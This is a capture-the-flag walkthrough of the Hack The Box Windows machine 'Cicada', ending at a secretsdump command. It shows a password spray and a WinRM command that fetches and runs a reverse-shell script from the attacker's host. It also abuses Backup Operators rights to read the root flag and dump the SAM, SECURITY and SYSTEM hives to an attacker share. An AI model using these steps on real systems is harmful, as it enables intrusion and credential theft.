# Cicada

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Cicada is an fun easy-rated Windows machine created by [theblxckcicada](https://app.hackthebox.com/users/796798)

The foothold involves password in guest-accessible SMB share and LDAP user descriptions, along with RID cycling.  
`Backup Operators` privileges can be abused for escalating to Administrator.

## Initial enumeration

```console
opcode@debian$ sudo nmap -v -p- --min-rate 2000 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up (0.15s latency).
Not shown: 65526 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
```

```console
opcode@debian$ sudo nmap -sC -sV -p 53,88,135,139,389,445,464,636,3268 -oN cicada.nmap 10.10.11.35
Nmap scan report for CICADA-DC.cicada.htb (10.10.11.35)
Host is up (0.15s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-29 02:04:46Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-09-29T02:05:02
|_  start_date: N/A
```

The presence of DNS, Kerberos, SMB, RPC, LDAP, WinRM, and other ports suggests it is a Domain Controller.  
We can start with LDAP enumeration:

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.11.35 -s base -b "" -LLL
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=cicada,DC=htb
ldapServiceName: cicada.htb:cicada-dc$@CICADA.HTB
[--SNIP--]
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=cicada,DC=htb
serverName: CN=CICADA-DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=cicada,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=cicada,DC=htb
namingContexts: DC=cicada,DC=htb
namingContexts: CN=Configuration,DC=cicada,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=cicada,DC=htb
namingContexts: DC=DomainDnsZones,DC=cicada,DC=htb
namingContexts: DC=ForestDnsZones,DC=cicada,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 201288
dsServiceName: CN=NTDS Settings,CN=CICADA-DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=cicada,DC=htb
dnsHostName: CICADA-DC.cicada.htb
defaultNamingContext: DC=cicada,DC=htb
currentTime: 20240929020246.0Z
configurationNamingContext: CN=Configuration,DC=cicada,DC=htb
```

Since the `dnsHostName` is set to FQDN `CICADA-DC.cicada.htb`, we can add it to `/etc/hosts`.  

```text
10.10.11.35 CICADA-DC.cicada.htb cicada.htb CICADA-DC
```

## SMB enumeration

I prefer to use [NetExec](https://github.com/Pennyw0rth/NetExec) for SMB enumeration:

```console
opcode@debian$ docker run -it --entrypoint=/bin/bash --rm --name netexec nxc:latest
root@ac7b58036eae:~# echo '10.10.11.35 CICADA-DC.cicada.htb cicada.htb CICADA-DC' >> /etc/hosts
```

Null sessions are disabled:

```console
root@ac7b58036eae:~# nxc smb 10.10.11.35 -d cicada.htb -u '' -p '' --shares
SMB         10.10.11.35   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35   445    CICADA-DC        [+] cicada.htb\: 
SMB         10.10.11.35   445    CICADA-DC        [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

However, guest sessions are enabled:

```console
root@ac7b58036eae:~# nxc smb 10.10.11.35 -d cicada.htb -u 'opcode' -p '' --shares
SMB         10.10.11.35   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35   445    CICADA-DC        [+] cicada.htb\opcode: (Guest)
SMB         10.10.11.35   445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35   445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35   445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35   445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35   445    CICADA-DC        C$                              Default share
SMB         10.10.11.35   445    CICADA-DC        DEV                         
SMB         10.10.11.35   445    CICADA-DC        HR              READ        
SMB         10.10.11.35   445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35   445    CICADA-DC        NETLOGON                        Logon server share
SMB         10.10.11.35   445    CICADA-DC        SYSVOL                          Logon server share
```

RID cycling:

```console
root@ac7b58036eae:~# nxc smb 10.10.11.35 -d cicada.htb -u 'opcode' -p '' --rid-brute 10000
SMB         10.10.11.35   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35   445    CICADA-DC        [+] cicada.htb\opcode: (Guest)
SMB         10.10.11.35   445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35   445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.10.11.35   445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.10.11.35   445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.10.11.35   445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.10.11.35   445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.10.11.35   445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.10.11.35   445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.10.11.35   445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.10.11.35   445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.10.11.35   445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.10.11.35   445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.35   445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.35   445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35   445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.35   445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.10.11.35   445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.10.11.35   445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.35   445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.35   445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35   445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35   445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.10.11.35   445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.10.11.35   445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.35   445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.10.11.35   445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.10.11.35   445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.10.11.35   445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35   445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35   445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.10.11.35   445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)
```

[impacket](https://github.com/fortra/impacket)'s `smbclient.py` can be used to check the HR share:

```console
opcode@debian$ smbclient.py cicada.htb/opcode@CICADA-DC.cicada.htb -no-pass
Impacket v0.12.0.dev1+20240815.101442.9eb25b3b - Copyright 2023 Fortra

Type help for list of commands
# use HR
# ls
drw-rw-rw-          0  Fri Mar 15 02:26:17 2024 .
drw-rw-rw-          0  Thu Mar 14 08:21:29 2024 ..
-rw-rw-rw-       1266  Wed Aug 28 13:31:48 2024 Notice from HR.txt
# get Notice from HR.txt
```

```console
opcode@debian$ cat Notice\ from\ HR.txt   

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp
```

Let's spray the password over all accounts:

```console
opcode@debian$ echo -e 'john.smoulder\nsarah.dantelia\nmichael.wrightson\ndavid.orelious\nemily.oscars' > users.txt
opcode@debian$ sudo ntpdate cicada.htb
opcode@debian$ kerbrute passwordspray --dc 10.10.11.35 -d cicada.htb ~/users.txt 'Cicada$M6Corpb*@Lp#nZp!8'

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/28/24 - Ronnie Flathers @ropnop

2024/09/28 22:15:13 >  Using KDC(s):
2024/09/28 22:15:13 >   10.10.11.35:88

2024/09/28 22:15:19 >  [+] VALID LOGIN:  michael.wrightson@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8
2024/09/28 22:15:19 >  Done! Tested 5 logins (1 successes) in 8.828 seconds
```

## Post-credential AD enumeration

Now that we have a set of credentials, we can enumerate more.  
Starting with SMB shares:

```console
root@ac7b58036eae:~# nxc smb 10.10.11.35 -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
SMB         10.10.11.35   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35   445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.10.11.35   445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35   445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35   445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35   445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35   445    CICADA-DC        C$                              Default share
SMB         10.10.11.35   445    CICADA-DC        DEV                             
SMB         10.10.11.35   445    CICADA-DC        HR              READ            
SMB         10.10.11.35   445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35   445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.10.11.35   445    CICADA-DC        SYSVOL          READ            Logon server share 
```

The `DEV` share is still inaccessible.  
Some other modules:

```console
root@ac7b58036eae:~# nxc smb 10.10.11.35 -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M enum_av
SMB         10.10.11.35   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35   445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
ENUM_AV     10.10.11.35   445    CICADA-DC        Found Windows Defender INSTALLED

root@ac7b58036eae:~# nxc ldap 10.10.11.35 -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M adcs
SMB         10.10.11.35   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35   389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
ADCS        10.10.11.35   389    CICADA-DC        [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'

root@ac7b58036eae:~# nxc ldap 10.10.11.35 -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M maq
SMB         10.10.11.35   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35   389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
MAQ         10.10.11.35   389    CICADA-DC        [*] Getting the MachineAccountQuota
MAQ         10.10.11.35   389    CICADA-DC        MachineAccountQuota: 10

root@ac7b58036eae:~# nxc ldap 10.10.11.35 -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --password-not-required
SMB         10.10.11.35   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35   389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.10.11.35   389    CICADA-DC        User: Guest Status: enabled

root@ac7b58036eae:~# nxc ldap 10.10.11.35 -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M enum_trusts
SMB         10.10.11.35   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35   389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
ENUM_TRUSTS 10.10.11.35   389    CICADA-DC        [*] No trust relationships found

root@ac7b58036eae:~# nxc ldap 10.10.11.35 -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M whoami
SMB         10.10.11.35   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35   389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
WHOAMI      10.10.11.35   389    CICADA-DC        distinguishedName: CN=Michael Wrightson,CN=Users,DC=cicada,DC=htb
WHOAMI      10.10.11.35   389    CICADA-DC        name: Michael Wrightson
WHOAMI      10.10.11.35   389    CICADA-DC        Enabled: Yes
WHOAMI      10.10.11.35   389    CICADA-DC        Password Never Expires: Yes
WHOAMI      10.10.11.35   389    CICADA-DC        Last logon: 133720499173807389
WHOAMI      10.10.11.35   389    CICADA-DC        pwdLastSet: 133548922493737634
WHOAMI      10.10.11.35   389    CICADA-DC        logonCount: 2
WHOAMI      10.10.11.35   389    CICADA-DC        sAMAccountName: michael.wrightson

root@ac7b58036eae:~# nxc ldap 10.10.11.35 -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M get-desc-users
SMB         10.10.11.35   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35   389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
GET-DESC... 10.10.11.35   389    CICADA-DC        [+] Found following users: 
GET-DESC... 10.10.11.35   389    CICADA-DC        User: Administrator description: Built-in account for administering the computer/domain
GET-DESC... 10.10.11.35   389    CICADA-DC        User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.10.11.35   389    CICADA-DC        User: krbtgt description: Key Distribution Center Service Account
GET-DESC... 10.10.11.35   389    CICADA-DC        User: david.orelious description: Just in case I forget my password is aRt$Lp#7t*VQ!3
```

And some groups:

```console
root@ac7b58036eae:~# nxc ldap 10.10.11.35 -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M group-mem -o group='Remote Management Users'
SMB         10.10.11.35   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35   389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
GROUP-MEM   10.10.11.35   389    CICADA-DC        [+] Found the following members of the Remote Management Users group:
GROUP-MEM   10.10.11.35   389    CICADA-DC        emily.oscars

root@ac7b58036eae:~# nxc ldap 10.10.11.35 -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M group-mem -o group='Remote Desktop Users'
SMB         10.10.11.35   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35   389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 

root@ac7b58036eae:~# nxc ldap 10.10.11.35 -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M group-mem -o group='Administrators'
SMB         10.10.11.35   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35   389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
GROUP-MEM   10.10.11.35   389    CICADA-DC        [+] Found the following members of the Administrators group:
GROUP-MEM   10.10.11.35   389    CICADA-DC        Administrator
GROUP-MEM   10.10.11.35   389    CICADA-DC        Enterprise Admins
GROUP-MEM   10.10.11.35   389    CICADA-DC        Domain Admins

root@ac7b58036eae:~# nxc ldap 10.10.11.35 -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M group-mem -o group='Protected Users'
SMB         10.10.11.35   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35   389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 

root@ac7b58036eae:~# nxc ldap 10.10.11.35 -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M group-mem -o group='Domain Computers'
SMB         10.10.11.35   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35   389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 

root@ac7b58036eae:~# nxc ldap 10.10.11.35 -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M group-mem -o group='Dev Support'
SMB         10.10.11.35   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35   389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
```

Another set of credentials can be obtained from user descriptions:

```console
david.orelious:aRt$Lp#7t*VQ!3
```

```console
root@ac7b58036eae:~# nxc ldap 10.10.11.35 -d cicada.htb -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -M whoami
SMB         10.10.11.35   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35   389    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
WHOAMI      10.10.11.35   389    CICADA-DC        description: Just in case I forget my password is aRt$Lp#7t*VQ!3
WHOAMI      10.10.11.35   389    CICADA-DC        distinguishedName: CN=David Orelious,CN=Users,DC=cicada,DC=htb
WHOAMI      10.10.11.35   389    CICADA-DC        name: David Orelious
WHOAMI      10.10.11.35   389    CICADA-DC        Enabled: Yes
WHOAMI      10.10.11.35   389    CICADA-DC        Password Never Expires: Yes
WHOAMI      10.10.11.35   389    CICADA-DC        Last logon: 133720502666463736
WHOAMI      10.10.11.35   389    CICADA-DC        pwdLastSet: 133548922495138483
WHOAMI      10.10.11.35   389    CICADA-DC        logonCount: 0
WHOAMI      10.10.11.35   389    CICADA-DC        sAMAccountName: david.orelious
```

```console
root@ac7b58036eae:~# nxc smb 10.10.11.35 -d cicada.htb -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB         10.10.11.35   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35   445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         10.10.11.35   445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35   445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35   445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35   445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35   445    CICADA-DC        C$                              Default share
SMB         10.10.11.35   445    CICADA-DC        DEV             READ            
SMB         10.10.11.35   445    CICADA-DC        HR              READ            
SMB         10.10.11.35   445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35   445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.10.11.35   445    CICADA-DC        SYSVOL          READ            Logon server share 
```

Now, the DEV share is accessible:

```console
opcode@debian$ smbclient.py cicada.htb/david.orelious:'aRt$Lp#7t*VQ!3'@CICADA-DC.cicada.htb
Impacket v0.12.0.dev1+20240815.101442.9eb25b3b - Copyright 2023 Fortra

Type help for list of commands
# use DEV
# ls
drw-rw-rw-          0  Wed Aug 28 13:27:31 2024 .
drw-rw-rw-          0  Thu Mar 14 08:21:29 2024 ..
-rw-rw-rw-        601  Wed Aug 28 13:28:22 2024 Backup_script.ps1
# get Backup_script.ps1
```

The script contains yet another set of credentials:

```console
opcode@debian$ cat Backup_script.ps1 

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
```

`emily.oscars` is a member of `Remote Management Users` group, and can obtain a WinRM session:

```console
root@ac7b58036eae:~# nxc winrm 10.10.11.35 -d cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -X 'IEX(IWR http://10.10.14.26:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.26 9001'
```

## Post-shell AD enumeration

```console
PS C:\> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

Emily is a backup operator. We can consider several different approaches for privilege escalation for this group.

## Abusing `Backup Operators` Group

### Robocopy

The `Backup Operators` group grants the user `SeBackupPrivilege` and `SeRestorePrivilege`.  
Robocopy can be used to obtain the root flag quickly:

```console
PS C:\> robocopy /b C:\Users\Administrator\Desktop\ C:\Windows\Tasks\
PS C:\> cat C:\Windows\Tasks\root.txt     
210362bcee6d57f29592a069a78ae5e4
```

Similar results can also be achieved via PowerShell:

```console
PS C:\> $acl = Get-Acl C:\Users\Administrator\Desktop\root.txt
PS C:\> $newRule = New-Object System.Security.AccessControl.FileSystemAccessRule("Everyone", "FullControl", "Allow")
PS C:\> $acl.SetAccessRule($newRule)
PS C:\> Set-Acl C:\Users\Administrator\Desktop\root.txt $acl
PS C:\> cat C:\Users\Administrator\Desktop\root.txt     
210362bcee6d57f29592a069a78ae5e4
```

### Dumping SAM and LSA secrets - Remote

When obtaining the flag is not the end goal, I usually dump the `SAM`, `SYSTEM`, and `SECURITY` registry hives and use the Domain Controller's machine account's NThash to DCsync.

I started an SMB server on my VM:

```console
opcode@debian$ smbserver.py -smb2support crate `pwd`
```

And tried dumping the registry hives:

```console
opcode@debian$ reg.py cicada.htb/emily.oscars:'Q!3@Lp#M6b*7t*Vt'@CICADA-DC.cicada.htb save -keyName 'HKLM\SAM' -o '\\10.10.14.26\crate'
Impacket v0.12.0.dev1+20240815.101442.9eb25b3b - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to \\10.10.14.26\crate\SAM.save

opcode@debian$ reg.py cicada.htb/emily.oscars:'Q!3@Lp#M6b*7t*Vt'@CICADA-DC.cicada.htb save -keyName 'HKLM\SECURITY' -o '\\10.10.14.26\crate'
Impacket v0.12.0.dev1+20240815.101442.9eb25b3b - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SECURITY to \\10.10.14.26\crate\SECURITY.save

opcode@debian$ reg.py cicada.htb/emily.oscars:'Q!3@Lp#M6b*7t*Vt'@CICADA-DC.cicada.htb save -keyName 'HKLM\SYSTEM' -o '\\10.10.14.26\crate'
Impacket v0.12.0.dev1+20240815.101442.9eb25b3b - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SYSTEM to \\10.10.14.26\crate\SYSTEM.save
```

`secretsdump.py` can be used to dump NThashes and other things from these hive dumps:

```console
opcode@server:~$ secretsdump.py -sam SAM.save -security SECURITY.save -system SYSTEM.save LOCAL
Impacket v0.12.0.dev1+20240821.233453.b6713d20 - Copyright 2023 Fortra

